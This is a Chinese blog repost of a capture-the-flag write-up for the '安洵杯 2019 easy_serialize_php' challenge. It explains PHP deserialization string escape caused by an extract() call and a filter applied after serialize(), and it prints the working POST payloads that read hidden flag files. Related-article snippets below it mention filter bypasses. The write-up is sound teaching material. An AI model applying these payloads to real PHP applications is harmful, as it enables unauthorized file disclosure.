php serialize ctf,CTF代码审计之[安洵杯 2019]easy_serialize_php

最新推荐文章于 2023-05-18 10:02:49 发布
最新推荐文章于 2023-05-18 10:02:49 发布
阅读量215 收藏
点赞数
文章标签: php serialize ctf

[安洵杯 2019]easy_serialize_php

考点:php反序列化逃逸

}if($_SESSION){unset($_SESSION);

}$_SESSION["user"] = ‘guest‘;$_SESSION[‘function‘] = $function;extract($_POST);if(!$function){echo ‘source_code‘;

}if(!$_GET[‘img_path‘]){$_SESSION[‘img‘] = base64_encode(‘guest_img.png‘);

}else{$_SESSION[‘img‘] = sha1(base64_encode($_GET[‘img_path‘]));

}$serialize_info = filter(serialize($_SESSION));if($function == ‘highlight_file‘){highlight_file(‘index.php‘);

}else if($function == ‘phpinfo‘){eval(‘phpinfo();‘); //maybe you can find something in here!

}else if($function == ‘show_image‘){$userinfo = unserialize($serialize_info);echo file_get_contents(base64_decode($userinfo[‘img‘]));

}

观察可以找到

20200914221316371604.png

还有根据代码

20200914221316398949.png

20200914221316424341.png

可以知道 数据在序列化之后又进行了一次过滤,可能会造成序列化之后数据丢失

php反序列化逃逸

特性一:

反序列化

//输入

//输出

array(2) {

[0]=>

string(5) "hello"[1]=>

string(5) "world"}

但是如果在str后面加上某些字符

//输入

//输出结果相同,不影响反序列化的正常进行

array(2) {

[0]=>

string(5) "hello"[1]=>

string(5) "world"}

特性二:

//输入

a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

假如后台有过滤机制,能让 flag 替换为空

则输出为

a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

//输入

array(3) {

["user"]=>

string(24) "";s:8:"function";s:59:"a"["img"]=>

string(20) "ZDBnM19mMWFnLnBocA=="["dd"]=>

string(1) "a"}

可以发现 SESSION数组的键值img对应的值发生了改变,可以知道,过滤掉 flag之后, ZDBnM19mMWFnLnBocA==  代替了真正 base64的编码,读取了d0g3_f1ag.php的内容,之后的内容则被被忽略掉了。

题目

payload:

post:_SESSION[flagflag]=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

20200914221316449732.png

再 替换为 _SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:2:"dd";s:1:"a";} 回显得到 flag

20200914221316512235.png

转载自 https://www.jianshu.com/p/8e8117f9fd0e 大佬的文章(侵权立删)

原文:https://www.cnblogs.com/yanwusheng/p/13668172.html

weixin_39569894
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf序列化
小飒的博客
08-19 1087
一、基础 序列化和反序列化 php中的两个函数 序列化函数:serialize() 反序列化函数:unserialize() 当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。 具体使用如下: <?php class xu{ var $a='1'; } $class1=new xu; echo serialize($class1); ?> 运行结果:O:2:“xu”:1:{s:1:“a”;s:1:“1”;} 反序列化 &
CTF-web_php_serialize反序列化
Be Smart
02-24 843
一.根据题目猜测和反序列化漏洞有关 1.思路: 进入实验环境后,发现是一段php代码,通过接受get请求方式将提交过来的var的值, 先进行base64解码,再进行正则的判断,如果不匹配成功就会反序列化输入的参数值。 所以这里我们目的就是为了绕过正则表达式,让其反序列化出我们要的fl4g.php,再通过析构函数,高亮出fl4g文件中的内容。 2.步骤: 通过代码中的注释我们发现flag在fl4g.php这个文件里面,所以我们要将其序列化 编写一段代码先实例化我们要序列化的类,这里吧fl4g.php传进去,
PHP的构造函数和析构函数
alkq42061的博客
07-13 142
1.构造函数: void __construct ([ mixed $args [, $... ]] ) PHP 5 允行开发者在一个类中定义一个方法作为构造函数。具有构造函数的类会在每次创建新对象时先调用此方法,所以非常适合在使用对象之前做一些初始化工作。 Note: 如果子类中定义了构造函数则不会隐式调用其父类的构造函数。要执行父类的构造函数,需要在子类的构造函数中调用 ...
buuctf-easy_serialize_php
m0_62593857的博客
04-20 126
serialize_info是$_SESSION序列化后的字符串经filter函数过滤后的值,而我们又可以通过extract函数通过post方法修改$_SESSION中的键值对,那么我们是否可以通过字符逃逸原理构造出键名为"img"的键值对呢?在filter函数中,发现'php','flag','php5','php4','fl1g'被过滤,因为这些字符串被替换为空字符串,导致序列化后的字符串字符数量减少,但记录的长度不变,我们就可利用这点构造出自己想要的变量和值,可构造payload。
CTF——Web——PHP序列化和反序列化
小锤队长的博客
08-09 5727
PHP 序列化和反序列化: 1,序列化(串行化):是将变量转换为可保存或传输的字符串的过程; 反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。 常见的php系列化和反系列化方式主要有:serialize,unserialize;json_encode,json_decode 在进行类的序列化...
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
`serialize`函数有两个主要形式:`void Serialize(CArchive& ar)`和`virtual void Serialize(__out_ecount_part(nCount, *pCount) void* lpData, UINT nCount, CArchive& ar)`。前者用于常规的成员变量串行化,后者...
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
浅谈php serialize()与unserialize()的用法
10-27
PHP中,`serialize()` 和 `unserialize()` 是两个非常重要的内置函数,它们主要用于数据的序列化和反序列化。序列化是将复杂的数据结构(如对象、数组)转换为字符串的过程,便于存储或传输。而反序列化则是将这个...
php serialize()与unserialize() 不完全研究
10-19
总的来说,`serialize()` 和 `unserialize()` 是 PHP 中处理复杂数据结构的强大工具,它们使得数据能够在各种场景下得以保存和复用,是 PHP 开发者必备的技能之一。了解它们的工作原理和使用方式,有助于提升代码的...
buuctf easy_serialize_php 解析
qq_73722777的博客
03-29 154
因为我们要让img的内容为d0g3_f1ag.phpbase64编码后的字符串,于是我们尝试直接给_SESSION[img]赋值。s:59:"a做为user的属性值,读取到a的时候结束,后面的;进行了闭合,相当于吞掉了一个属性和值,接着会继续读取我们构造的img,由于总共三个属性,我在后边加上了一个属性和值,后边的序列化结果直接就被丢弃。将这里的user和function进行修改,然后这里会进行代码一开始的过滤,将变量$img中的php flag php5 php4 fl1g的字符串替换成’'空字符。
php unset ctf,CTF PHP反序列化
weixin_33897367的博客
03-12 316
序列化所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。 --php官方文档魔术方法构造函数和析构函数__construct() 具有构造函数的类会在每次创建新对象时先调用此方法,所以非常适合在使用对象之前做一些...
PHP反序列化-CTF-攻防世界-unseping
最新发布
theenderofroot的博客
05-18 293
_wakeup方法使用waf方法对$args的内容进行了过滤,过滤掉了| &;__destruct方法检测ping是否在$method中,并调用了名为$method的方法,以数组$args中的值作为参数。综合来看就是通过$method和__construct来调用构造的ping方法,接着通过$args作为输入口进行命令的输入。此时这个最终的payload的中,我们采用单双引号绕过正则过滤,${IFS}绕过空格过滤,printf绕过/过滤。此处使用了${IFS}绕过了空格过滤,返回结果如下。
[CTF][安洵 2019]easy_serialize_php 1 -- 反序列化漏洞、反序列化字符逃逸
Gh0st_1n_The_Shell的博客
08-28 1285
[安洵 2019]easy_serialize_php 1 首先打开靶机,只有一个链接没有其他东西 目录爆破没有爆破出来东西,打开链接,发现给出了网站源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; retu
unserialize php ctf,ctf serialize 序列化和反序列化
weixin_34571272的博客
03-26 584
反序列化图片.png和往常一样,先进入网址。这里我们可以看到上面的源代码。unserialize($str) === "$KEY"我们举个例子$arr=array();$arr['name']='张三';$arr['age']='22';$arr['sex']='男';$arr['phone']='123456789';$arr['address']='上海市浦东新区'; var_dump($ar...
BUUCTF 安洵 easy_serialize_php题目解析
2201_75327657的博客
03-29 195
反序列化后又为 {s:4:"flag";s:3:"img";得到fag=flag in /d0g3_fllllllag再利用base64转化得到flag。d0g3——flag.php的base64为ZDBnM19mMWFnLnBocA==查看后寻找flag位置得到它在d0g3里面通过看源码得知需要利用base64转化。这题是利用phpinfo查看回显。通过查看源码就能得知许多信息。
CTF php反序列化总结
m0_53567065的博客
11-17 4393
前言:本⼈⽔平不⾼,只能做⼀些类似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的一篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~定义:序列化就是将对象转换成字符串。反序列化相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。漏洞原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化的过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。常用魔术方法
某web题 初次接触反序列化
weixin_43928140的博客
05-13 1014
记录菜鸡生活的第五天02 首先打开题目 先抓个包看下 看到这个,应该是说username这个东西他要经过md5加密,并且是0开头的字符串,所以我们先百度一个数在md5加密后符合要求的输进去 登进去之后发现是代码审计了 $unserialize_str = $_POST['password']; $data_unserialize = unserialize($unserialize_s...
ctf知识点总结
sun的博客
10-28 3271
php的序列化和反序列化:serialize()和unserialize()函数的作用是把复杂的数据类型压缩到一个字符串中来传输 例如:我们要传输一个数组 $stooges = array('Moe','Larry','Curly'); $new = serialize($stooges); print_r($new);echo "<br />"; print_r(unse...
实验吧CTF—Web writeup 第二部分
Senimo
08-21 1074
实验吧CTF—Web writeup 第二部分天网管理系统忘记密码了Once MoreGuess Next SessionFALSE上传绕过NSCTF web200程序逻辑问题what a fuck!这是什么鬼东西?PHP大法这个看起来有点简单!貌似有点难头有点大猫抓老鼠看起来有点难 天网管理系统 分值:10 难度:易 天网你敢来挑战嘛 格式:ctf{ } 解题链接 忘记密码了 分值:20 难度:...
[安洵 2019]easy_serialize_php 1
03-16
具体的操作步骤可以参考以下代码: ```php <?php class User { public $name; public $age; } // 反序列化 $data = unserialize('O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:18;}'); // 修改属性值 $...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值